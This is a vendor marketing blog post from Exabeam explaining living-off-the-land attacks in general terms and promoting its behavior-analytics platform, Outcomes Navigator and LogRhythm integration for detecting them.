Attackers are becoming more sophisticated and stealthier. Their methods are more advanced. Of these advanced methods, living-off-the-land (LOTL) attacks are the sneakiest and most effective. By using legitimate tools and processes already in your environment, malicious actors can get what they want without being seen. But with the Exabeam New-Scale Security Operations Platform and our industry leading user and entity behavior analytics (UEBA), security teams can stop them.
LOTL: Hiding in Plain Sight
LOTL attacks use legitimate tools, software, or features to do bad things. Instead of introducing external malware or unauthorized tools, attackers use native utilities or built-in processes, so detection is much harder.
How LOTL Attacks Slip Through Defenses
- Hijacking Trusted Tools: Attackers use tools like PowerShell, Windows Management Instrumentation (WMI), or PsExec to run their campaigns.
- Invisible to Traditional Defenses: Since these tools are legitimate and widely used, traditional security solutions don’t detect malicious use.
- Stealthy Persistence: LOTL techniques allow attackers to hide and move laterally in the network without tripping alarms.
Tricks LOTL Attackers Don’t Want You to See
- Using PowerShell to run malicious scripts
- Using Windows Task Scheduler to maintain persistence
- Exploiting remote desktop utilities or MS Office macros to run code
While these are hard to detect with signature-based tools, Exabeam UEBA exposes these threats like never before.
Exabeam Behavior Analytics: Your Edge Against LOTL Attacks
Exabeam UEBA is the secret sauce against stealthy attackers. It allows security teams to detect subtle anomalies in user and entity behavior even when attackers hide in plain sight. Here’s how Exabeam UEBA stays ahead of LOTL attacks.
1. Find Anomalies Others Miss
Exabeam UEBA builds dynamic baselines for every user and entity in your organization. These baselines capture normal activity patterns so the platform can detect deviations such as:
- A user who has never run scripts before using PowerShell
- A file transfer from an endpoint or server
- A remote desktop connection at odd hours or from an unknown location
2. Cut Through the Noise with Context
When Exabeam UEBA detects suspicious activity, it provides rich contextual information to security operations center (SOC) analysts. This includes the user or entity involved, the specific action flagged, and the risk score. Analysts get the whole story, so investigations are faster and more accurate.
3. Lateral Movement? Not on Our Watch
LOTL attacks often involve lateral movement as attackers navigate through the network. Exabeam UEBA monitors user and entity interactions, showing unusual access or resource usage that indicates lateral movement.
4. Uncover Insider Threats
Whether an insider’s account is compromised, or an employee is being malicious, Exabeam UEBA reveals behaviors that are out of character for them, such as:
- Accessing data they’ve never accessed before
- Trying to escalate privileges with no prior history
- Lateral movement with first-time access to new systems and hosts
5. Amplify Detection with Third-Party Integration
Exabeam UEBA integrates with its advanced security information and event management (SIEM) and security orchestration, automation, and response (SOAR) capabilities to enrich alerts and automate responses. As the first and only security operations vendor to support Open API Standard (OAS), Exabeam makes third-party security tool integration easier than ever. This means LOTL attacks are not only detected but also stopped quickly.
Real World Scenario: Detecting LOTL with Exabeam
Imagine a scenario where an authorized user account runs PowerShell scripts to download files from an external IP address. For traditional security tools this activity would go unnoticed because PowerShell is a legitimate tool. But Exabeam UEBA knows this user has never run PowerShell like this before and flags the behavior as anomalous. By correlating this event with other activities such as unusual login times or lateral movement attempts, Exabeam can help analysts uncover a LOTL attack in progress before it’s too late.
Why the Exabeam New-Scale Security Operations Platform Is a Game Changer
The Exabeam New-Scale Security Operations Platform with industry-leading UEBA capabilities gives security teams the power to:
- Proactively detect stealthy attacks like LOTL
- Reduce alert fatigue by only alerting on truly anomalous behavior
- Supercharge threat detection and response with context and automation
By focusing on behavior instead of static rules or signatures, the Exabeam approach provides a strong defense against modern attack techniques including LOTL. When attackers are using tools already trusted within the organization, the Exabeam ability to detect deviations and uncover hidden threats is a must-have in any security strategy.
Focused on Outcomes
In addition to industry-leading UEBA capabilities, Exabeam helps customers focus on positive security outcomes. Outcomes Navigator delivers exceptional value to our customers by allowing them to see how their security coverage matches up to MITRE ATT&CK® tactics, techniques, and procedures (TTPs).
Exabeam Outcomes Navigator is a tool within the New-Scale Security Operations Platform that helps security teams assess how well their environment is configured to protect against specific security threats, identifying potential gaps in coverage and providing recommendations on how to improve their security posture by aligning their data sources with common security use cases, essentially acting as a way to visualize and measure the effectiveness of their security configuration against known threats.
LOTL falls into the category of “Defense Evasion” in the ATT&CK framework. Outcomes Navigator measures against 44 different TTPs within the category and makes recommendations on additional data sources that can improve your coverage against specific types of attacks.
LogRhythm Platform? Not a Problem!
If you’re an existing LogRhythm customer, you can now see the immediate benefits of the merger with Exabeam. In just a few short months we’ve already delivered our industry-leading UEBA detections to the LogRhythm platform with LogRhythm Intelligence. LogRhythm Intelligence is a backend cloud-native UEBA detection engine that delivers behavior analytics directly to the existing LogRhythm platform UI you’re already familiar with.
Conclusion: This is my land
Ready to uncover and kill stealthy attackers? Learn more about the Exabeam New-Scale Platform today
